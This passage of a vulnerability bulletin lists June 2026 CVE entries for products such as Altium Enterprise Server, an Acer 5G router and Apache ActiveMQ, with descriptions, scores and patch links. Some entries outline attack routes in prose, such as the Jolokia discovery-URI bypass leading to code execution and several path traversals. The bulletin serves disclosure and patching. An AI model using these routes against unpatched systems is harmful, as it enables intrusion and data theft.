| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, the Java TLS ioctl probe reads user-controlled ioctl pointers with bpf_probe_read instead of bpf_probe_read_user. An instrumented local process can therefore point OBI at kernel memory and cause that memory to be copied into telemetry. This issue has been patched in version 0.9.0. | 2026-06-02 | 3.8 | CVE-2026-45683 |
| Open5GS--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.6. The impacted element is the function gmm_state_security_mode of the file src/amf/gmm-sm.c of the component NGAP Handover. Performing a manipulation results in race condition. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitability is regarded as difficult. The exploit has been released to the public and may be used for attacks. The pull request to fix this issue awaits acceptance. | 2026-06-02 | 3.1 | CVE-2026-10565 |
| OpenStack--Neutron | In OpenStack Neutron before 28.0.1, a project manager can create or update a port on a shared network owned by another project and set device_owner to a value that has "network:" at the beginning ("network:dhcp" for example). The default port RBAC policies incorrectly included PROJECT_MANAGER without requiring network ownership, allowing any project manager to obtain trusted network-service port behavior on shared networks. Depending on backend and deployment, this can bypass anti-spoofing and security group protections, enabling DHCP, MAC, or IP spoofing against other tenants on the shared network. This is a regression of CVE-2015-5240 (OSSA-2015-018). | 2026-06-04 | 2.2 | CVE-2026-50266 |
| Orthanc--DICOM Server | A security flaw has been discovered in Orthanc DICOM Server up to 1.12.11. This issue affects the function DcmItem::read of the file OrthancFramework/Sources/DicomParsing/FromDcmtkBridge.cpp of the component DCMTK Parser. Performing a manipulation results in stack-based buffer overflow. Attacking locally is a requirement. The exploit has been released to the public and may be used for attacks. The patch is named bae99026ca97. To fix this issue, it is recommended to deploy a patch. | 2026-06-02 | 3.3 | CVE-2026-10528 |
| OTRS AG--OTRS | An incorrect handling of permissions in the OTRS External Interface and the ConfigItem List module allows an authenticated customer to query the system for CI information. Please note that CMDB has to be enabled and CustomerGroupSupport has to be used to be affected. This issue affects OTRS: * 7.0.X * 8.0.X * 2023.X * 2024.X * 2025.X * 2026.X before 2026.4.X | 2026-06-01 | 3.5 | CVE-2026-48190 |
| OTRS AG--OTRS | An incorrect handling of permissions in STORM powered by OTRS and in the OTRS (2026.x and above) Document Search Article Meta Filters modules allows gaining knowledge about the number of affected CIs, SLAs and services without gaining access to them. This issue affects OTRS with STORM modules: * 7.0.X * 8.0.X * 2023.X * 2024.X * 2025.X * 2026.X before 2026.4.X | 2026-06-01 | 3.5 | CVE-2026-48191 |
| PaddlePaddle--FastDeploy | A weakness has been identified in PaddlePaddle FastDeploy up to 2.4.1. Affected by this issue is the function hash_features of the file fastdeploy/multimodal/hasher.py of the component MultimodalHasher. Executing a manipulation can lead to use of weak hash. The attack requires local access. A high complexity level is associated with this attack. The exploitation is known to be difficult. This patch is called 374945747652a8d32965591c0c01a00c88b7067f. Applying a patch is advised to resolve this issue. | 2026-06-04 | 3.6 | CVE-2026-10800 |
| projectcapsule--capsule | Capsule is a multi-tenancy and policy-based framework for Kubernetes. To defend against namespace hijacking achieved through update/patch operations on namespaces, Capsule uses a webhook to validate update requests targeting namespaces. However, in Kubernetes, the namespace/finalize and namespace/status subresource APIs can also modify various fields of a namespace, including the metadata field. Prior to version 0.13.0, the webhook does not define interception rules for these subresources. As a result, if a tenant administrator has permission to modify namespace/status or namespace/finalize, they can successfully perform namespace hijacking. Version 0.13.0 fixes the issue. Another mitigation is to add the two subresources (namespaces/status and namespaces/finalize) to the resources list in the ValidatingWebhookConfiguration rules. | 2026-06-01 | 3.9 | CVE-2026-30963 |
| raisulislamg4--student_management_system_by_php | A vulnerability was found in raisulislamg4 student_management_system_by_php up to 310d950e09013d5133c6b9210aff9444382d16d1. The impacted element is an unknown function of the file admission_form_check.php. The manipulation of the argument Message results in cross site scripting. The attack can be executed remotely. The exploit has been made public and could be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 3.5 | CVE-2026-10228 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in org.keycloak.services. An administrator with delegated access to read group memberships and users can bypass user profile permissions by accessing the group members endpoint. This allows the administrator to view user attributes that are explicitly configured to be denied, leading to information disclosure. | 2026-06-05 | 2.7 | CVE-2026-9088 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in gnutls. The PKCS#7 padding check, performed during decryption, was not constant-time. This timing side-channel could allow a remote attacker to potentially leak sensitive information about the padding bytes through observable timing differences. This vulnerability is a form of information disclosure. | 2026-06-01 | 3.7 | CVE-2026-5419 |
| SecureAge--CatchPulse | A security vulnerability has been detected in SecureAge CatchPulse up to 10.9.1. Impacted is an unknown function in the library saappctl.sys of the component IOCTL Handler. The manipulation leads to information disclosure. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 3.3 | CVE-2026-11459 |
| sgl-project--SGLang | A vulnerability was determined in sgl-project SGLang up to 0.5.11. Affected by this vulnerability is the function data_hash of the component Cache Handler. This manipulation causes denial of service. The attack is restricted to local execution. A high degree of complexity is needed for the attack. The exploitation appears to be difficult. The exploit has been publicly disclosed and may be utilized. The pull request to fix this issue awaits acceptance. | 2026-06-03 | 3.6 | CVE-2026-10775 |
| SGLang--SGLang | A security vulnerability has been detected in SGLang 0.5.10.post1. Impacted is an unknown function of the file python/sglang/srt/lora/lora_manager.py of the component Inference HTTP Endpoint. Such manipulation of the argument lora_path leads to reachable assertion. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is considered difficult. The exploit has been disclosed publicly and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-01 | 3.7 | CVE-2026-10300 |
| songquanpeng--one-api | A security flaw has been discovered in songquanpeng one-api up to 0.6.11-preview.7. Affected by this issue is the function Redeem of the file model/redemption.go of the component Redemption Code Top-Up Endpoint. The manipulation results in business logic errors. The attack may be launched remotely. The attack requires a high level of complexity. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The pull request to fix this issue awaits acceptance. | 2026-06-07 | 3.1 | CVE-2026-11465 |
| SourceCodester--Customer Review App | A vulnerability was found in SourceCodester Customer Review App 1.0. Affected by this vulnerability is the function add_review/save_review/get_all_reviews of the file review_app.py. Performing a manipulation of the argument name/comment results in denial of service. The attack requires a local approach. The exploit has been made public and could be used. | 2026-06-01 | 3.3 | CVE-2026-10295 |
| SourceCodester--Hospitals Patient Records Management System | A vulnerability was detected in SourceCodester Hospitals Patient Records Management System 1.0. This issue affects some unknown processing of the file /admin/?page=room_types. Performing a manipulation of the argument room results in cross site scripting. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-06-07 | 2.4 | CVE-2026-11468 |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability was detected in SourceCodester Pharmacy Sales and Inventory System 1.0. Affected by this vulnerability is the function create_medicine_name of the file /ShowForm/create_medicine_name/main. Performing a manipulation of the argument medicine_name results in cross site scripting. The attack can be initiated remotely. The exploit is now public and may be used. | 2026-06-01 | 3.5 | CVE-2026-10244 |
| SourceCodester--Pharmacy Sales and Inventory System | A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. Affected by this issue is the function create_supplier of the file /ShowForm/create_supplier/main. Executing a manipulation of the argument company_name can lead to cross site scripting. The attack can be launched remotely. The exploit has been published and may be used. | 2026-06-01 | 3.5 | CVE-2026-10245 |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects the function create_medicine_presentation of the file /ShowForm/create_medicine_presentation/main. The manipulation of the argument medicine_presentation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 3.5 | CVE-2026-10246 |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability was found in SourceCodester Pharmacy Sales and Inventory System 1.0. This vulnerability affects the function create_generic_name of the file /ShowForm/create_generic_name/main. The manipulation of the argument generic_name results in cross site scripting. The attack may be launched remotely. The exploit has been made public and could be used. | 2026-06-01 | 3.5 | CVE-2026-10247 |
| SourceCodester--Ship Ferry Ticket Reservation System | A security vulnerability has been detected in SourceCodester Ship Ferry Ticket Reservation System 1.0. Impacted is an unknown function of the file /admin/?page=user/manage_user. The manipulation of the argument Username leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. | 2026-06-05 | 2.4 | CVE-2026-11338 |
| Streamlit--Streamlit | A vulnerability has been found in Streamlit up to 1.53.0. Impacted is an unknown function in the library lib/streamlit/runtime/caching/hashing.py of the component Palette Handler. Such manipulation leads to use of weak hash. Local access is required to approach this attack. The attack requires a high level of complexity. The exploitability is considered difficult. The exploit has been disclosed to the public and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-04 | 3.6 | CVE-2026-10804 |
| strawberry-graphql--strawberry | Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.288.4 through 0.315.3, Strawberry's bundled GraphiQL template wrote values from the GraphiQL headers editor into the browser URL query string. If a user entered a sensitive header, such as `Authorization: Bearer <token>`, the value could become visible in browser history, copied links, and server/proxy/CDN access logs after a page reload or shared request. Version 0.315.4 patches the issue. | 2026-06-04 | 3.1 | CVE-2026-45739 |
| thedotmack--claude-mem | A weakness has been identified in thedotmack claude-mem up to 11.0.1. The affected element is the function computeObservationContentHash of the file src/services/sqlite/observations/store.ts of the component Observation Content Hash Handler. This manipulation causes use of weak hash. The attack can only be executed locally. The attack's complexity is rated as high. The exploitability is described as difficult. Upgrading to version 12.0.0 is sufficient to fix this issue. Patch name: f32fda8b35e9fe9329f87da65c31149362a03f97. It is suggested to upgrade the affected component. | 2026-06-05 | 3.6 | CVE-2026-11330 |
| unitedbyai--droidclaw | A vulnerability was detected in unitedbyai droidclaw up to 0.5.3. The affected element is an unknown function of the file server/src/routes/pairing.ts of the component claim Endpoint. The manipulation results in improper restriction of excessive authentication attempts. The attack may be launched remotely. This attack is characterized by high complexity. The exploitability is described as difficult. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 3.7 | CVE-2026-10216 |
| westboy--CicadasCMS | A weakness has been identified in westboy CicadasCMS up to 2431154dac8d0735e04f1fd2a3c3556668fc8dab. Impacted is an unknown function of the file src/main/java/com/zhiliao/module/web/system/ScheduleJobController.java of the component Task Scheduling Management Module. Executing a manipulation can lead to cross site scripting. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-02 | 2.4 | CVE-2026-10529 |
| wpvividplugins--WPvivid Backup, Migration & Staging | The Migration, Backup, Staging - WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary directory deletion due to insufficient file path validation in the delete_cancel_staging_site() function in all versions up to, and including, 0.9.128. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary folders on the server, which leads to a loss of data. | 2026-06-05 | 3.8 | CVE-2025-12656 |
| zilliztech--GPTCache | A vulnerability was detected in zilliztech GPTCache up to 0.1.44. Affected by this issue is the function BufferedReader.peek of the file gptcache/processor/pre.py of the component Cache Key Handler. Performing a manipulation of the argument input_data["image"] results in use of weak hash. The attack must be initiated from a local position. The attack is considered to have high complexity. The exploitation is known to be difficult. The exploit is now public and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-04 | 3.6 | CVE-2026-10812 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Acer--Connect M6E 5G Portable WiFi Router | The FieldX MDM adb messaging topic passes unverified payloads directly into Runtime.exec(), allowing command/instruction injection. | 2026-06-04 | not yet calculated | CVE-2026-49185 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The local MQTT broker does not enforce topic-level Access Control Lists (ACLs). This allows any client to subscribe using wildcard characters (# or +) to enumerate hidden network devices or publish rogue control commands. | 2026-06-04 | not yet calculated | CVE-2026-49186 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The hard-coded APK resource files never expire, and the shared scepter leads to information leaks and potential misuse. | 2026-06-04 | not yet calculated | CVE-2026-49187 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The ai_cmd utility executes with full root permissions. It pipes socket inputs directly to popen(), paving the way for unauthenticated users to execute arbitrary root commands. | 2026-06-04 | not yet calculated | CVE-2026-49188 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Unchecked public access permissions on a core Broadcast Receiver allow unauthorized local software components to invoke administrative operations. | 2026-06-04 | not yet calculated | CVE-2026-49189 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The system fails to evaluate instructional permissions over multiple internal operation codes (opcodes), permitting unauthorized application installations or command executions. | 2026-06-04 | not yet calculated | CVE-2026-49190 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The production build of the M3WebServer hard-codes its backend API keys, which can be easily intercepted through verbose error handling pages. | 2026-06-04 | not yet calculated | CVE-2026-49191 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The summary service endpoint suffers from an IDOR vulnerability where it fails to verify user ownership of hardware serial numbers, exposing device data to scraping. | 2026-06-04 | not yet calculated | CVE-2026-49192 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Overly permissive configuration settings on cloud storage containers expose active telemetry information publicly to the internet. | 2026-06-04 | not yet calculated | CVE-2026-49193 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The debugging routine SCREEN_CLICK(5053) enables a connection to skip the standard device login prompt entirely and directly enter an interactive shell interface. | 2026-06-04 | not yet calculated | CVE-2026-49194 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Internal multimedia session archives are accessible without authentication, exacerbated by loose Cross-Origin Resource Sharing (CORS) rules that allow cross-site theft. | 2026-06-04 | not yet calculated | CVE-2026-49202 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Crucial management API endpoints for cellular eSIM allocation do not validate caller authorization, allowing remote profiles to be rewritten or deleted. | 2026-06-04 | not yet calculated | CVE-2026-49203 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Leftover debug modules contain fixed credentials for internal AWS Cognito test sandboxes, risking asset exploitation. | 2026-06-04 | not yet calculated | CVE-2026-49204 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | System log files output unencrypted SMTP server authentication passwords alongside sensitive employee corporate identification data. | 2026-06-04 | not yet calculated | CVE-2026-50205 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Incoming VPN network profile settings fail to process special characters safely, enabling command injection via malicious config files. | 2026-06-04 | not yet calculated | CVE-2026-50206 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The system Binder boundary accepts unverified pass-through AT commands, giving local applications the power to read baseband files or disable cellular connectivity. | 2026-06-04 | not yet calculated | CVE-2026-50207 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | High-risk TrustAllCerts routines disable standard TLS certificate validation. Combined with hard-coded DES symmetric encryption keys, a Man-in-the-Middle (MITM) actor could decrypt network traffic. | 2026-06-04 | not yet calculated | CVE-2026-50208 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Broadcast events allow malicious software to rewrite the device's default Mobile Device Management (MDM) endpoint address, shifting administrative ownership to an external attacker. | 2026-06-04 | not yet calculated | CVE-2026-50209 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The device encrypts data using AES-CBC with static zero-filled Initialization Vectors (IVs), making it susceptible to replay attacks and known-plaintext decryption. | 2026-06-04 | not yet calculated | CVE-2026-50210 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Leftover engineering diagnostics and factory-level diagnostic software remain exposed on retail builds, giving malicious apps write privileges to internal NVRAM registers. | 2026-06-04 | not yet calculated | CVE-2026-50211 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Weak validation logic within device dissociation API routines allows a remote entity to forcefully unbind unrelated user endpoints, causing severe denial of service. | 2026-06-04 | not yet calculated | CVE-2026-50212 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The account validation endpoint /v1/User/validate returns comprehensive user profile data sheets, which can be crawled by iterating predictable identification strings. | 2026-06-04 | not yet calculated | CVE-2026-50213 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The /v1/Plan service relies entirely on a shared global API token for full administrative management, allowing arbitrary creation of zero-cost network access plans. | 2026-06-04 | not yet calculated | CVE-2026-50214 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The web administration panel binds to the IPv6 wildcard address ([::]:8080) without default firewall limits, making internal API endpoints reachable over the WAN. | 2026-06-04 | not yet calculated | CVE-2026-50224 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | The registration path /v1/account/register provides no bot mitigation mechanisms, allowing malicious automated systems to flood the database. | 2026-06-04 | not yet calculated | CVE-2026-50225 | https://community.acer.com/en/kb/articles/19707 |
| Acer--Connect M6E 5G Portable WiFi Router | Fixed AES-128-CBC keys inside the AcerConnect OTA application let attackers forge authorization credentials for arbitrary IMEI numbers. This allows unauthorized actors to list catalog items and extract protected binaries from pre-signed cloud links. | 2026-06-04 | not yet calculated | CVE-2026-50226 | https://community.acer.com/en/kb/articles/19707 |
| Acronis--Acronis DeviceLock DLP | Local privilege escalation due to excessive permissions assigned to child processes. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.15051.93227. | 2026-06-03 | not yet calculated | CVE-2026-42061 | SEC-3083 |
| Acronis--Acronis DeviceLock DLP | Local privilege escalation due to EXE hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.15051.93227. | 2026-06-03 | not yet calculated | CVE-2026-44609 | SEC-3084 |
| Acronis--Acronis DeviceLock DLP | Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.15051.93227. | 2026-06-03 | not yet calculated | CVE-2026-44682 | SEC-11249 |
| Acronis--Acronis DeviceLock DLP | Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.15051.93227. | 2026-06-03 | not yet calculated | CVE-2026-50033 | SEC-3085 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.14.0, cookies set with the `cookies` parameter on a request are still sent after following a cross-origin redirect. If a developer uses the `cookies` parameter on a per-request basis, sensitive data might be leaked to an attacker who manages to control a redirect. Version 3.14.0 patches the issue. If upgrading is not possible, passing the cookies as a `Cookie` header in the `headers` parameter is not affected. | 2026-06-02 | not yet calculated | CVE-2026-47265 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hg6j-4rv6-33pg https://github.com/aio-libs/aiohttp/commit/f54c40851b0d6c4bbdab97ba518a223adda32478 |
| Aiven-Open--klaw | Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to version 2.10.4, improper access control allows disclosure of password hash. This issue has been patched in version 2.10.4. | 2026-06-02 | not yet calculated | CVE-2026-45080 | https://github.com/Aiven-Open/klaw/security/advisories/GHSA-v7m7-fr8v-hpx2 https://github.com/Aiven-Open/klaw/releases/tag/v2.10.4 |
| Altium--Altium Enterprise Server | A hard-coded cryptographic key is used by Altium Enterprise Server to sign file download URLs in the Vault service. Because the key is identical across all installations, an unauthenticated network attacker who can reach the server can forge valid download signatures and retrieve files from the Vault storage area without any authentication, session, or credentials. A separate path traversal vulnerability in the same download endpoint allows the configured storage root to be escaped, enabling reads of arbitrary files on the server filesystem. Combined, these issues allow an unauthenticated attacker to obtain sensitive server configuration and key material, which can lead to full server compromise. The vulnerability can be chained with CVE-2026-9152 to enumerate and bulk-download stored content. Altium 365 cloud deployments are not impacted in practice, as file storage uses object storage rather than the local filesystem. | 2026-06-05 | not yet calculated | CVE-2026-11414 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Altium Enterprise Server Vault Service UploadController due to improper validation of a user-controlled path component in image upload requests. An authenticated user can supply a crafted absolute path so that the configured storage root is discarded, allowing arbitrary files to be written to any location on the server filesystem writable by the service account. Because content-controlled files can be written to web-accessible directories, or used to overwrite application binaries or configuration files, this can be escalated to remote code execution, service takeover, or denial of service. Altium 365 cloud deployments are not affected, as the affected endpoint is not reachable and the cloud storage architecture mitigates the file-write primitive. | 2026-06-05 | not yet calculated | CVE-2026-11419 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | Two path traversal vulnerabilities in the Network Installation Service (NIS) of Altium Enterprise Server allow an unauthenticated network attacker to write arbitrary files to any writable location on the server filesystem and to read package archive files from the server. No authentication, session, or credentials are required. Because content-controlled files can be written to web-accessible directories, or used to overwrite application binaries or configuration files, exploitation can be escalated to remote code execution in the context of the service account, and can disclose deployment package contents. Altium 365 cloud deployments are not affected, as the Network Installation Service is not part of the cloud offering. | 2026-06-05 | not yet calculated | CVE-2026-11420 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Altium Enterprise Server Collaboration Service due to improper handling of user-supplied filenames in the MCAD and Simulation file download flows. A regular authenticated user can submit a collaboration message containing a crafted filename, which is later used to construct the download path on the server without validation, allowing arbitrary files to be read from the server filesystem. Because the readable files include the server's master configuration, which stores credentials for privileged accounts, exploitation can lead to authenticating as a system administrator and gaining full control of the server. Altium 365 cloud deployments are not affected. | 2026-06-05 | not yet calculated | CVE-2026-11423 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A server-side request forgery (SSRF) vulnerability exists in a GraphQL service component shared by Altium Enterprise Server and Altium 365. An authenticated user can submit a request whose input is treated as a URL by the server and used to issue an outbound HTTP GET request without URL validation or destination filtering. The response body is then returned to the user. This allows an authenticated attacker to reach internal services and metadata endpoints that would not otherwise be accessible from the public network, and to retrieve their contents. The impact is information disclosure and internal infrastructure reconnaissance; the request primitive is limited to HTTP GET with no custom headers. Altium Enterprise Server is fixed in 8.1.1; the issue has been remediated in Altium 365 at the service level. | 2026-06-05 | not yet calculated | CVE-2026-11424 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Git Service component shared by Altium Enterprise Server and Altium 365. The service accepts a sequence of post-clone file-manipulation operations that use user-supplied paths without validation, allowing an authenticated user with basic git access to move arbitrary files outside the intended repository area. This file-move primitive can be used to place attacker-controlled script content into directories where it is later executed by the service, resulting in remote code execution under the Git Service account. On multi-tenant Altium 365 deployments, this could have allowed access to data belonging to other tenants on the same infrastructure node. Altium Enterprise Server is fixed in 8.1.1; the issue has been remediated in Altium 365 at the service level. | 2026-06-05 | not yet calculated | CVE-2026-11429 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Projects Service download endpoint shared by Altium Enterprise Server and Altium 365. An authenticated user can supply a crafted path parameter that bypasses validation, allowing arbitrary files (including entire directories returned as archives) to be read from the server filesystem. Because the readable files include service configuration and credential material, exploitation can be used to gather information enabling further compromise. The issue can be combined with CVE-2026-11424 to reach the cloud-side endpoint. On multi-tenant Altium 365 deployments, the readable configuration could have exposed credentials shared across services. Altium Enterprise Server is fixed in 8.1.1; the issue has been remediated in Altium 365 at the service level. | 2026-06-05 | not yet calculated | CVE-2026-11431 | https://www.altium.com/platform/security-compliance/security-advisories |
| AMD--AMD Athlon 3000 Series Mobile Processors with Radeon Graphics | Insufficient granularity of access control in ASP (AMD Secure Processor) may allow an attacker with an untrusted user space application to map sensitive SMN (System Management Network) apertures leading to a potential escalation of privileges. | 2026-06-01 | not yet calculated | CVE-2021-46747 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| Apache Software Foundation--Apache ActiveMQ | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache ActiveMQ, Apache ActiveMQ Web. The MessageServlet in the ActiveMQ web console API copies every JMS message property into an HTTP response header without any validation. This can allow overwriting and injecting security headers by setting them on JMS messages that are returned by the servlet. This issue affects Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ Web: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue. The MessageServlet has now been deprecated and disabled by default. | 2026-06-01 | not yet calculated | CVE-2026-42253 | https://lists.apache.org/thread/j9vmlc410ht5f28fc98gx75jcbq62j00 |
| Apache Software Foundation--Apache ActiveMQ | Incorrect Default Permissions vulnerability in Apache ActiveMQ. This issue affects Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. The default Jolokia authorization settings granted non-admin (low-privilege) web-login accounts access to Jolokia operations which allowed executing broker management operations meant for admins such as addQueue and removeQueue. Users are recommended to upgrade to version 6.2.6 or 5.19.7, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-49157 | https://lists.apache.org/thread/rrcsf6s90hj4tdh89nvkko75q5505rj8 |
| Apache Software Foundation--Apache ActiveMQ Broker | Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter using the "masterslave://" URL, which can allow loading a Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-42588 | https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm |
| Apache Software Foundation--Apache ActiveMQ Broker | Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ. Non-parenthesized discovery wrappers such as `masterslave:vm://...,...` and `static:vm://...` incorrectly pass validation, allowing a bypass of the fix for CVE-2026-34197. The original description from CVE-2026-34197 follows. Apache ActiveMQ exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-45505 | https://nvd.nist.gov/vuln/detail/CVE-2026-34197 https://lists.apache.org/thread/7n97nddyw96w6ykldjv1h40jx86xdo0w |
| Apache Software Foundation--Apache ActiveMQ Broker | Incomplete authorization in Apache ActiveMQ server before versions v6.2.6 and v5.19.7 allows authenticated connections that lack the proper permissions to remove existing destinations. This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. Users are recommended to upgrade to version v6.2.6 or v5.19.7, which fixes the issue. | 2026-06-01 | not yet calculated | CVE-2026-46605 | https://lists.apache.org/thread/l4lxgr2s73g9pb218f180psfyskf8ldm |
